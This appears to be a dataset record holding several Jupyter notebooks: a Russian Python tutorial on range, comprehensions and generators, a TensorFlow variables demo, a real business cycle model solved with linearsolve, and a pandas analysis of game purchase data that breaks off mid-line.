"for i in range(10, 0, -1):\n print(i)",
"10\n9\n8\n7\n6\n5\n4\n3\n2\n1\n"
]
],
[
[
"А теперь отличие от итераторов! У range можно обратиться к элементу или даже срезу (как в списках)",
"_____no_output_____"
]
],
[
[
"print(range(3)[1])",
"1\n"
],
[
"print(range(10)[2:5])",
"range(2, 5)\n"
]
],
[
[
"Немного истории: в Python 2 были функции **range** и **xrange**. Первая создавала список (прям настоящий список), а вторая - \\\nименно то, что теперь в Python 3 называется **range**",
"_____no_output_____"
],
[
"### Задача 1\nСчитайте с клавиатуры несколько чисел через пробел и выведите сумму их кубов\n\n**Вход:** 1 2 3 \\\n**Выход:** 36",
"_____no_output_____"
]
],
[
[
"# Решение\nnumbers = map(int,input().split()) \nx = 0\nfor i in numbers:\n x += i**2\nprint(x)",
"1 2 3 4 5 6\n91\n"
]
],
[
[
"### Задача 2\nСчитайте с клавиатуры две последовательности чисел через пробел и выведите список уникальных общих элементов этих двух последовательностей. Сделать это можно с помощью вложенного цикла for и, например, множеств.\n\n**Вход:** \n\n Последовательность 1: 1 2 3 \n \n Последовательность 2: 2,2,4,7,4,3 \n \n**Выход:** \n\n Общие элементы: [2,3]",
"_____no_output_____"
],
[
"Взяли и посчитали вложенными циклами",
"_____no_output_____"
]
],
[
[
"common = set()\n\nlist1 = list(map(int,input().split()))\nlist2 = list(map(int,input().split()))\n\nfor elem1 in list1:\n for elem2 in list2:\n if elem1 == elem2:\n common.add(elem1)\n break\n\nprint(common)",
"1 2 3 4 5\n2 2 3 3\n{2, 3}\n"
]
],
[
[
"Но можно было и без этого. Решать можно было в несколько строк с использованием функционала множеств",
"_____no_output_____"
]
],
[
[
"set1 = set(map(int,input().split()))\nset2 = set(map(int,input().split()))\nset1.intersection(set2)",
"1 2 2 2 2 3 4 6 4 \n3 7 6 3 2\n"
]
],
[
[
"### Задача 3\nДан список, содержащий строки, целые числа и числа с плавающей точкой. Разбить его на три списка так, чтобы в одном остались только строки, в другом - только целые числа, а в третьем - только числа с плавающей точкой. Заметьте, что при проверке типов название типа пишется без кавычек, например **int**.\n\n**Вход:** \n\n Список 1: [1, 2, 5.6, 7.5, 'Boo', 1, 'RocknRoll']\n \n**Выход:** \n\n Список 1: [1, 2, 1]\n Список 2: [5.6, 7.5]\n Список 3: ['Boo', 'RocknRoll']",
"_____no_output_____"
]
],
[
[
"#Решение\nlist1 = [1, 2, 5.6, 7.5, 'Boo', 1, 'RocknRoll']\n\nints, floats, strings = [], [], []\nfor i in list1:\n if type(i)==int:\n ints.append(i)\n elif type(i)==float:\n floats.append(i)\n else:\n strings.append(i)\nprint(ints)\nprint(floats)\nprint(strings)",
"[1, 2, 1]\n[5.6, 7.5]\n['Boo', 'RocknRoll']\n"
]
],
[
[
"### Генераторы списков и списковые включения. aka List Comprehensions\nЭтот элемент языка считается его \"визитной карточкой\". Это своего рода метод быстро создать новый список, не применяя цикл for. Пусть мы, к примеру, хотим создать список с числами от 0 до 20",
"_____no_output_____"
]
],
[
[
"a = []\nfor i in range(20):\n a.append(i)\na",
"_____no_output_____"
]
],
[
[
"Это же выражение можно записать с помощью спискового включения",
"_____no_output_____"
]
],
[
[
"a = [i for i in range(20)]\nprint(type(a))\nprint(a)",
"<class 'list'>\n[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\n"
]
],
[
[
"Что мы видим? Во-первых, на выходе такой конструкцими мы получили лист (конечно, это же СПИСКОВОЕ включение). А во-вторых, все написано в одну строчку и , кажется следует вот такой конструкции:\n\n**new_list** = [**expression** for **member** in **iterable**]\n\n1. **expression** какое либо вычисление, вызов метода или любое другое допустимое выражение, которое возвращает значение. В приведенном выше примере выражение i * i является квадратом значения члена.\n2. **member** является объектом или значением в списке или итерируемым объекте (iterable). В приведенном выше примере значением элемента является i.\n3. **iterable** список, множество, последовательность, генератор или любой другой объект, который может возвращать свои элементы по одному. В приведенном выше примере iterable является range(20).\n\nОдним из основных преимуществ использования является то, что это единственный инструмент, который вы можете использовать в самых разных ситуациях. В дополнение к созданию стандартного списка, списки могут также использоваться для отображения и фильтрации. Вам не нужно использовать разные подходы для каждого сценария. Например, можно в раздел **expression** поставить функцию str(), которая превратит каждый элемент исходного списка в строку.",
"_____no_output_____"
]
],
[
[
"lst = [1,2,3,4,5,45,67,8,765,854,76]\nx = [str(i) for i in lst]\nx",
"_____no_output_____"
]
],
[
[
"Но и это еще не все. В списковое включение можно добавить какое нибудь условие (как мы это делали с **if**). Выглядеть это будет так:\n\n new_list = [expression for member in iterable (if conditional)]\n\nРазберем на примере:",
"_____no_output_____"
]
],
[
[
"lst = [1,2,3,4,5,45,67,8,765,854,76]\nx = [i for i in lst if i%2 == 0] #Здесь я взял и включил в новый список только четные элементы\nx",
"_____no_output_____"
]
],
[
[
"Более того - не зря в условии написано iterable, а не list. Значит можно попробовать проделать что-то подобное с любыми другими итерируемыми объектами. с кортежами все точно должно получиться:",
"_____no_output_____"
]
],
[
[
"# Предложение\nsentence = '''The rocket, who was named Ted, came back \n from Mars because he missed his friends.'''\n\n# Гласные английского языка и пробел\nvowels = 'aeiou '\n\n# достанем в список все символы строки, которые не являются гласными и пробелом.\nconsonants = [i for i in sentence if i not in vowels]\nconsonants",
"_____no_output_____"
]
],
[
[
"А еще вот так можно было... Не зря же регулярные выражения проходили.",
"_____no_output_____"
]
],
[
[
"import re\nre.findall(r'[^aeiou ]',sentence)",
"_____no_output_____"
]
],
[
[
"Мы уже поняли, что можно поместить условие в конец оператора для простой фильтрации, но что, если хочется изменить значение элемента вместо его фильтрации? В этом случае полезно поместить условное выражение в начале выражения. Выглядит это вот так:\n\n new_list = [expression (if conditional) for member in iterable]\n\nС помощью этого шаблона можно, например, использовать условную логику для выбора из нескольких возможных вариантов вывода. Допустим, у вас есть список цен, можно заменить отрицательные цены (это могут быть какие-то ошибки логирования) на 0 и оставить положительные значения без изменений:",
"_____no_output_____"
]
],
[
[
"original_prices = [1.25, -9.45, 10.22, 3.78, -5.92, 1.16]\nprices = [i if i > 0 else 0 for i in original_prices]\nprices",
"_____no_output_____"
]
],
[
[
"Здесь, наше выражение **i** содержит условный оператор, **if i> 0** else **0**. Это говорит Python выводить значение **i**, если число положительное, но менять **i** на **0**, если число отрицательное.",
"_____no_output_____"
],
[
"### Включения для множеств и словарей",
"_____no_output_____"
],
[
"Хотя **list comprehension** в Python является распространенным инструментом, вы также можете создавать множественные и словарные представления (**set and dictionary comprehensions**). **set comprehension** почти точно такое же, как представление списка. Разница лишь в том, что заданные значения обеспечивают, чтобы выходные данные не содержали дубликатов. Вы можете создать **set comprehension**, используя фигурные скобки вместо скобок:",
"_____no_output_____"
]
],
[
[
"quote = \"life, uh, finds a way\"\nunique_vowels = {i for i in quote if i in 'aeiou'}\nunique_vowels",
"_____no_output_____"
]
],
[
[
"Здесь мы вывели все уникальные гласные, которые встретились в строке",
"_____no_output_____"
],
[
"**Dictionary comprehensions** , по сути, работает так же, но с дополнительным требованием определения ключа. Ключ отделяется двоеточием.\n",
"_____no_output_____"
]
],
[
[
"squares = {i: i * i for i in range(10)}\nsquares",
"_____no_output_____"
]
],
[
[
"### Генераторы списков",
"_____no_output_____"
],
[
"По сути, это то же самое, что списковое включение, но только возвращает оно не сам список, а генератор. ",
"_____no_output_____"
]
],
[
[
"type((i * i for i in range(10)))",
"_____no_output_____"
]
],
[
[
"Проверим:",
"_____no_output_____"
]
],
[
[
"x = (i * i for i in range(10))",
"_____no_output_____"
],
[
"next(x)",
"_____no_output_____"
],
[
"next(x)",
"_____no_output_____"
]
],
[
[
"Так-так, функция next работает.",
"_____no_output_____"
]
],
[
[
"x[4]",
"_____no_output_____"
]
],
[
[
"К элементам обращаться нельзя",
"_____no_output_____"
]
],
[
[
"x = (i * i for i in range(10))\nwhile True:\n print(next(x))",
"0\n1\n4\n9\n16\n25\n36\n49\n64\n81\n"
]
],
[
[
"**StopIteration!** Опять что-то знакомое) Получается, что генератор, это , на самом деле, какой-то вид итератора. Так оно и есть. Генератор это итератор, который можно получить с помощью генераторного выражения, например, (i * i for i in range(10)) или с помощью функции-генератора (но об этом в следующей серии.",
"_____no_output_____"
],
[
"\nТак а зачем все это нужно-то? А вот возьмите, например, и посчитайте сумму квадратов первого миллиона чисел",
"_____no_output_____"
]
],
[
[
"%time\nsum([i * i for i in range(1000000)])",
"CPU times: user 3 µs, sys: 0 ns, total: 3 µs\nWall time: 6.91 µs\n"
],
[
"%time\nsum(i * i for i in range(1000000))",
"CPU times: user 2 µs, sys: 0 ns, total: 2 µs\nWall time: 3.81 µs\n"
]
],
[
[
"При использовании генератора время существенно меньше",
"_____no_output_____"
],
[
"Ура, теоретическая часть закончилась. Теперь можно порешать задачи!",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb01c3d38d6fdf1ac40147546ff5ba18b4d73a0e | 2,050 | ipynb | Jupyter Notebook | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | Celebrate-future/yuzhouwan | bf77fe9ba5a1db84d1a51bb8da4d7591b0af5e8f | [
"Apache-2.0"
] | 44 | 2015-08-04T09:05:17.000Z | 2021-12-19T11:01:31.000Z | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | huangzhanqiao/yuzhouwan | 4781a25cc36c66af1a83ca7f1bc648424974b0c5 | [
"Apache-2.0"
] | 261 | 2019-06-13T21:22:51.000Z | 2022-03-26T03:29:53.000Z | yuzhouwan-ai/yuzhouwan-ai-tensorflow/src/main/resources/ipython/Variable.ipynb | huangzhanqiao/yuzhouwan | 4781a25cc36c66af1a83ca7f1bc648424974b0c5 | [
"Apache-2.0"
] | 17 | 2016-10-19T09:16:15.000Z | 2021-07-26T08:53:06.000Z | 18.807339 | 51 | 0.467805 | [
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"# 创建变量\na = tf.Variable([1, 0])\nb = tf.Variable([0, 1])\n# sub/add 两个 operation\nsub = tf.subtract(a, b)\nadd = tf.add(a, b)\n\n# 初始化变量\ninit = tf.global_variables_initializer()",
"_____no_output_____"
],
[
"# 执行 Session\nwith tf.Session() as sess:\n sess.run(init)\n print(sess.run(sub))\n print(sess.run(add))",
"[ 1 -1]\n[1 1]\n"
],
[
"# Counter\ncounter = tf.Variable(0, name=\"counter\")\nadd_one = tf.add(counter, 1)\nassign = tf.assign(counter, add_one)\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init)\n for _ in range(5):\n sess.run(assign)\n print(sess.run(counter))",
"1\n2\n3\n4\n5\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb01c80784770013728348b68fb2f59f898c5ff8 | 81,847 | ipynb | Jupyter Notebook | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 2 | 2020-12-12T16:28:44.000Z | 2021-02-24T12:11:04.000Z | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 1 | 2019-04-29T08:50:41.000Z | 2019-04-29T08:51:05.000Z | Lecture Notebooks/Econ126_Class_14.ipynb | letsgoexploring/econ126 | 05f50d2392dd1c7c38b14950cb8d7eff7ff775ee | [
"MIT"
] | 19 | 2019-03-08T18:49:19.000Z | 2022-03-07T23:27:16.000Z | 199.626829 | 68,080 | 0.892299 | [
[
[
"import numpy as np\nimport pandas as pd\nimport linearsolve as ls\nimport matplotlib.pyplot as plt\nplt.style.use('classic')\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"# Class 14: Prescott's Real Business Cycle Model I\n\nIn this notebook, we'll consider a centralized version of the model from pages 11-17 in Edward Prescott's article \"Theory Ahead of Business Cycle Measurement in the Fall 1986 of the Federal Reserve Bank of Minneapolis' *Quarterly Review* (link to article: https://www.minneapolisfed.org/research/qr/qr1042.pdf). The model is just like the RBC model that we studying in the previous lecture, except that now we include an endogenous labor supply.",
"_____no_output_____"
],
[
"## Prescott's RBC Model with Labor\n\nThe equilibrium conditions for Prescott's RBC model with labor are:\n\n\\begin{align}\n\\frac{1}{C_t} & = \\beta E_t \\left[\\frac{\\alpha A_{t+1}K_{t+1}^{\\alpha-1}L_{t+1}^{1-\\alpha} +1-\\delta }{C_{t+1}}\\right]\\\\\n\\frac{\\varphi}{1-L_t} & = \\frac{(1-\\alpha)A_tK_t^{\\alpha}L_t^{-\\alpha}}{C_t} \\\\\nY_t & = A_t K_t^{\\alpha}L_t^{1-\\alpha}\\\\\nK_{t+1} & = I_t + (1-\\delta) K_t\\\\\nY_t & = C_t + I_t\\\\\n\\log A_{t+1} & = \\rho \\log A_t + \\epsilon_{t+1}\n\\end{align}\n\nwhere $\\epsilon_{t+1} \\sim \\mathcal{N}(0,\\sigma^2)$. \n\nThe objective is use `linearsolve` to simulate impulse responses to a TFP shock using the following parameter values for the simulation:\n\n| $$\\rho$$ | $$\\sigma$$ | $$\\beta$$ | $$\\varphi$$ | $$\\alpha$$ | $$\\delta $$ |\n|----------|------------|-------------|-----------|------------|-------------|\n| 0.75 | 0.006 | 0.99 | 1.7317 | 0.35 | 0.025 |\n\n\nThe value for $\\beta$ implies a steady state (annualized) real interest rate of about 4 percent: \n \n\\begin{align}\n4 \\cdot \\left(\\beta^{-1} - 1\\right) & \\approx 0.04040\n\\end{align}\n\n$\\rho = 0.75$ and $\\sigma = 0.006$ are consistent with the statistical properties of the cyclical component of TFP in the US. $\\alpha$ is set so that, consistent with the long-run average of the US, the labor share of income is about 65 percent of GDP. The deprecation rate of capital is calibrated to be about 10 percent annually. Finally, $\\varphi$ was chosen last to ensure that in the steady state households allocate about 33 percent of their available time to labor.",
"_____no_output_____"
],
[
"## Model Preparation\n\nBefore proceding, let's recast the model in the form required for `linearsolve`. Write the model with all variables moved to the left-hand side of the equations and dropping the expecations operator $E_t$ and the exogenous shock $\\epsilon_{t+1}$:\n\n\\begin{align}\n0 & = \\beta\\left[\\frac{\\alpha A_{t+1}K_{t+1}^{\\alpha-1}L_{t+1}^{1-\\alpha} +1-\\delta }{C_{t+1}}\\right] - \\frac{1}{C_t}\\\\\n0 & = \\frac{(1-\\alpha)A_tK_t^{\\alpha}L_t^{-\\alpha}}{C_t} - \\frac{\\varphi}{1-L_t}\\\\\n0 & = A_t K_t^{\\alpha}L_t^{1-\\alpha} - Y_t\\\\\n0 & = I_t + (1-\\delta) K_t - K_{t+1}\\\\\n0 & = C_t + I_t - Y_t\\\\\n0 & = \\rho \\log A_t - \\log A_{t+1}\n\\end{align}\n\nRemember, capital and TFP are called *state variables* because they're $t+1$ values are predetermined. Output, consumption, and investment are called a *costate* or *control* variables. Note that the model as 5 equations in 5 endogenous variables.\n\n",
"_____no_output_____"
],
[
"## Initialization, Approximation, and Solution\n\nThe next several cells initialize the model in `linearsolve` and then approximate and solve it.",
"_____no_output_____"
]
],
[
[
"# Create a variable called 'parameters' that stores the model parameter values in a Pandas Series\nparameters = pd.Series(dtype=float)\nparameters['rho'] = .75\nparameters['beta'] = 0.99\nparameters['phi'] = 1.7317\nparameters['alpha'] = 0.35\nparameters['delta'] = 0.025\n\n# Print the model's parameters\nprint(parameters)",
"rho 0.7500\nbeta 0.9900\nphi 1.7317\nalpha 0.3500\ndelta 0.0250\ndtype: float64\n"
],
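[
"# Quick check of the claim above: the annualized real interest rate implied by beta = 0.99\nprint(4*(1/parameters['beta'] - 1))",
"_____no_output_____"
],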
[
"# Create a variable called 'sigma' that stores the value of sigma\nsigma = 0.006",
"_____no_output_____"
],
[
"# Create variable called 'var_names' that stores the variable names in a list with state variables ordered first\nvar_names = ['a','k','y','c','i','l']\n\n# Create variable called 'shock_names' that stores an exogenous shock name for each state variable.\nshock_names = ['e_a','e_k']",
"_____no_output_____"
],
[
"# Define a function that evaluates the equilibrium conditions of the model solved for zero. PROVIDED\ndef equilibrium_equations(variables_forward,variables_current,parameters):\n \n # Parameters. PROVIDED\n p = parameters\n \n # Current variables. PROVIDED\n cur = variables_current\n \n # Forward variables. PROVIDED\n fwd = variables_forward\n \n # Define variable to store MPK. Will make things easier later.\n mpk = p.alpha*fwd.a*fwd.k**(p.alpha-1)*fwd.l**(1-p.alpha)\n \n # Define variable to store MPL. Will make things easier later.\n mpl = (1-p.alpha)*fwd.a*fwd.k**p.alpha*fwd.l**-p.alpha\n\n # Euler equation\n euler_equation = p.beta*(mpk+1-p.delta)/fwd.c - 1/cur.c\n \n # Labor-labor choice\n labor_leisure = mpl/cur.c - p.phi/(1-cur.l)\n \n # Production function\n production_function = cur.a*cur.k**p.alpha*cur.l**(1-p.alpha) - cur.y\n \n # Capital evolution. PROVIDED\n capital_evolution = cur.i + (1 - p.delta)*cur.k - fwd.k\n \n # Market clearing. PROVIDED\n market_clearing = cur.c+cur.i - cur.y\n \n # Exogenous tfp. PROVIDED\n tfp_process = p.rho*np.log(cur.a) - np.log(fwd.a)\n \n \n # Stack equilibrium conditions into a numpy array\n return np.array([\n euler_equation,\n labor_leisure,\n production_function,\n capital_evolution,\n market_clearing,\n tfp_process\n ])",
"_____no_output_____"
]
],
[
[
"Next, initialize the model using `ls.model` which takes the following required arguments:\n\n* `equations`\n* `n_states`\n* `var_names`\n* `shock_names`\n* `parameters`",
"_____no_output_____"
]
],
[
[
"# Initialize the model into a variable named 'rbc_model'\nrbc_model = ls.model(equations = equilibrium_equations,\n n_states=2,\n var_names=var_names,\n shock_names=shock_names,\n parameters=parameters)",
"_____no_output_____"
],
[
"# Compute the steady state numerically using .compute_ss() method of rbc_model\nguess = [1,4,1,1,1,0.5]\nrbc_model.compute_ss(guess)\n\n# Print the computed steady state\nprint(rbc_model.ss)",
"a 1.000000\nk 11.465953\ny 1.149904\nc 0.863256\ni 0.286649\nl 0.333330\ndtype: float64\n"
],
[
"# Find the log-linear approximation around the non-stochastic steady state and solve using .approximate_and_solve() method of rbc_model\nrbc_model.approximate_and_solve()",
"_____no_output_____"
]
],
[
[
"## Impulse Responses\n\nCompute a 26 period impulse responses of the model's variables to a 0.01 unit shock to TFP in period 5.",
"_____no_output_____"
]
],
[
[
"# Compute impulse responses\nrbc_model.impulse(T=26,t0=5,shocks=[0.01,0])\n\n# Print the first 10 rows of the computed impulse responses to the TFP shock\nprint(rbc_model.irs['e_a'].head(10))",
" e_a a k y c i l\n0 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n1 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n2 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n3 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n4 0.00 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000\n5 0.01 0.010000 0.000000 0.015475 0.001708 0.056935 0.008423\n6 0.00 0.007500 0.001423 0.011858 0.002071 0.041333 0.005938\n7 0.00 0.005625 0.002421 0.009133 0.002304 0.029698 0.004093\n8 0.00 0.004219 0.003103 0.007077 0.002442 0.021036 0.002727\n9 0.00 0.003164 0.003551 0.005524 0.002511 0.014600 0.001719\n"
]
],
[
[
"Construct a $2\\times3$ grid of plots of simulated TFP, output, labor, consumption, investment, and capital. Be sure to multiply simulated values by 100 so that vertical axis units are in \"percent deviation from steady state.\"",
"_____no_output_____"
]
],
[
[
"# Create figure. PROVIDED\nfig = plt.figure(figsize=(18,8))\n\n# Create upper-left axis. PROVIDED\nax = fig.add_subplot(2,3,1)\nax.plot(rbc_model.irs['e_a']['a']*100,'b',lw=5,alpha=0.75)\nax.set_title('TFP')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create upper-center axis. PROVIDED\nax = fig.add_subplot(2,3,2)\nax.plot(rbc_model.irs['e_a']['y']*100,'b',lw=5,alpha=0.75)\nax.set_title('Output')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create upper-right axis. PROVIDED\nax = fig.add_subplot(2,3,3)\nax.plot(rbc_model.irs['e_a']['l']*100,'b',lw=5,alpha=0.75)\nax.set_title('Labor')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.5,2])\nax.grid()\n\n# Create lower-left axis. PROVIDED\nax = fig.add_subplot(2,3,4)\nax.plot(rbc_model.irs['e_a']['c']*100,'b',lw=5,alpha=0.75)\nax.set_title('Consumption')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.1,0.4])\nax.grid()\n\n# Create lower-center axis. PROVIDED\nax = fig.add_subplot(2,3,5)\nax.plot(rbc_model.irs['e_a']['i']*100,'b',lw=5,alpha=0.75)\nax.set_title('Investment')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-2,8])\nax.grid()\n\n# Create lower-right axis. PROVIDED\nax = fig.add_subplot(2,3,6)\nax.plot(rbc_model.irs['e_a']['k']*100,'b',lw=5,alpha=0.75)\nax.set_title('Capital')\nax.set_ylabel('% dev from steady state')\nax.set_ylim([-0.2,0.8])\nax.grid()\n\nfig.tight_layout()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01d01238c17a20fdd19611706e3db45ca9fb25 | 42,318 | ipynb | Jupyter Notebook | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | HeroesOfPymoli.ipynb | alyslma/pandas-challenge | 9cdb5a78ed27ab4beeed2b986f7b7b6339b29814 | [
"ADSL"
] | null | null | null | 35.531486 | 179 | 0.386928 | [
[
[
"import pandas as pd\n\ndatafile = \"Resources/purchase_data.csv\"\n\npurchase_data = pd.read_csv(datafile)\npurchase_data.head()",
"_____no_output_____"
],
[
"# Player Count\n\nplayer_count = purchase_data[\"SN\"].count()\nplayer = pd.DataFrame({\"Total Players\": [player_count]})\nplayer",
"_____no_output_____"
],
[
"# Purchasing Analysis (Total)\n\nunique_item = purchase_data[\"Item Name\"].nunique()\navg_price = purchase_data[\"Price\"].mean()\nnum_purchase = purchase_data[\"SN\"].count()\ntotal_rev = purchase_data[\"Price\"].sum()\n\nsummary_df = pd.DataFrame({\"Number of Unique Items\": [unique_item],\n \"Average Price\": [avg_price],\n \"Number of Purchases\": [num_purchase],\n \"Total Revenue\": [total_rev]})\n\nsummary_df[\"Average Price\"] = summary_df[\"Average Price\"].map(\"${:.2f}\".format)\nsummary_df[\"Total Revenue\"] = summary_df[\"Total Revenue\"].map(\"${:,.2f}\".format)\n\nsummary_df",
"_____no_output_____"
],
[
"# Gender Demographics\n\nunique_players = purchase_data[[\"SN\", \"Gender\"]].drop_duplicates()\ngender_counts = unique_players[\"Gender\"].value_counts()\ngender_percent = gender_counts / unique_players[\"Gender\"].count()\n\n# Make gender counts a dataframe\ngender_demo = pd.DataFrame(gender_counts)\n\n# Format percentage of players\ngender_demo[\"Percentage of Players\"] = gender_percent * 100\ngender_demo[\"Percentage of Players\"] = gender_demo[\"Percentage of Players\"].map(\"{0:.2f}%\".format)\n\ngender_demo",
"_____no_output_____"
],
[
"# Purchasing Analysis (Gender) \n\n# List of all genders\ngenders = purchase_data[\"Gender\"].unique()\n\n# Make list of dataframes with each gender's data and lists for each calculation\ngender_df = []\ngender_purc_count = []\ngender_avg_price = []\ngender_purc_total = []\ngender_avg_total = []\n\nfor n in range(len(genders)):\n value = purchase_data.loc[(purchase_data[\"Gender\"] == genders[n])]\n gender_df.append(value)\n # Purchase count\n value = gender_df[n][\"SN\"].count()\n gender_purc_count.append(value)\n # Average purchase price\n value = gender_df[n][\"Price\"].mean()\n gender_avg_price.append(value)\n # Total purchase value\n value = gender_df[n][\"Price\"].sum()\n gender_purc_total.append(value)\n # Count total unique persons \n unique = gender_df[n][\"SN\"].nunique()\n # Calculate average purchase total per person by gender\n avg_total = value / unique\n gender_avg_total.append(avg_total)\n\n# Summary dataframe\ngender_analy_df = pd.DataFrame({\"Gender\":[genders[0], genders[1], genders[2]],\n \"Purchase Count\":[gender_purc_count[0], gender_purc_count[1], gender_purc_count[2]], \n \"Average Purchase Price\":[gender_avg_price[0], gender_avg_price[1], gender_avg_price[2]],\n \"Total Purchase Value\":[gender_purc_total[0], gender_purc_total[1], gender_purc_total[2]],\n \"Avg Total Purchase per Person\":[gender_avg_total[0], gender_avg_total[1], gender_avg_total[2]]\n }) \n\ngender_analy_df[\"Average Purchase Price\"] = gender_analy_df[\"Average Purchase Price\"].map(\"${:.2f}\".format)\ngender_analy_df[\"Total Purchase Value\"] = gender_analy_df[\"Total Purchase Value\"].map(\"${:,.2f}\".format)\ngender_analy_df[\"Avg Total Purchase per Person\"] = gender_analy_df[\"Avg Total Purchase per Person\"].map(\"${:.2f}\".format)\n\ngender_analy_df = gender_analy_df.set_index([\"Gender\"])\ngender_analy_df",
"_____no_output_____"
],
[
"# Age Demographics\n\n# Lowest age: 7, highest age: 45\nbins = [5, 9, 14, 19, 24, 29, 34, 39, 44, 49]\ngroup_labels = [\"<10\", \"10-14\", \"15-19\", \"20-24\", \"25-29\", \"30-34\", \"35-39\", \"40-44\", \"45+\"]\n \nage_bin = pd.cut(purchase_data[\"Age\"], bins, labels=group_labels, include_lowest=False)\nage_count = pd.DataFrame(age_bin.value_counts(sort=False))\n\n# Rename column\nage_count = age_count.rename(columns ={\"Age\": \"Total Count\"})\n\nage_count[\"Percentage of Players\"] = (age_count[\"Total Count\"] / player_count) * 100\nage_count[\"Percentage of Players\"] = age_count[\"Percentage of Players\"].map(\"{0:.2f}%\".format)\n\nage_count",
"_____no_output_____"
],
[
"# Purchasing Analysis (Age)\nage_analy = purchase_data.copy()\n\n# Add column of age ranges to copy of original dataframe\nage_analy[\"Age Ranges\"] = pd.cut(age_analy[\"Age\"], bins, labels=group_labels, include_lowest=False)\n\n# Get total of unique values per age group\nunique_group_age = age_analy[[\"SN\", \"Age Ranges\"]].drop_duplicates()\nunique_group_age = unique_group_age[\"Age Ranges\"].value_counts(sort=False)\n\n# Make a dataframe for the summary table, add column of unique value counts for each age group\nage_group_sum = pd.DataFrame(unique_group_age)\nage_group_sum = age_group_sum.rename(columns= {\"Age Ranges\" : \"Unique Value Count\"})\nage_group_sum.index.name='Age Ranges'\n\n# Group by age ranges for calculations\ngroup_age = age_analy.groupby(\"Age Ranges\")\n# Add Purchase Count to summary table\nage_group_total_count = group_age[\"Age Ranges\"].count()\nage_group_sum[\"Purchase Count\"] = age_group_total_count\n# Add Average Purchase Price to summary table\nage_group_avg_purch = group_age[\"Price\"].mean()\nage_group_sum[\"Average Purchase Price\"] = age_group_avg_purch\n# Add Total Purchase Value to summary table\nage_group_total = group_age[\"Price\"].sum()\nage_group_sum[\"Total Purchase Value\"] = age_group_total\n# Divide the \"Total Purchase Value\" and \"Unique Value Count\" columns to get 